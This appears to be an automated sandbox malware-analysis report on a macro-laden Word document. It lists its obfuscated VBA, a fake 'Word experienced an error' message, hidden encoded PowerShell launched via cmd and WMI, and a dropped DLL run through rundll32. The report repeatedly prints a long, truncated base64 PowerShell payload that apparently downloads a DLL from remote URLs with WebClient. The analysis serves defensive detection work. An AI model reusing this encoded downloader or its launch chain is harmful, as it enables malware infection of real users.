Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp

Source: Doc.doc

Initial sample: OLE summary subject = fuchsia Health & Industrial copying PNG National Handcrafted Plastic Towels utilize Baby & Grocery interface array

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: Doc.doc	Stream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76			Name: Qfepbztq9r8o1l76

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

7_2_10013BFB

PE file contains an invalid checksum

Source: Yvtlx6p4.dll.5.dr

Static PE information: real checksum: 0x4a297 should be: 0x40b13

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000B0BD push ecx; ret	7_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007BCA push ecx; ret	7_2_10007BDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001BCE92 push cs; retf	8_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_006ACE92 push cs; retf	11_2_006ACE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001ECE92 push cs; retf	13_2_001ECE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0068CE92 push cs; retf	15_2_0068CE94

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

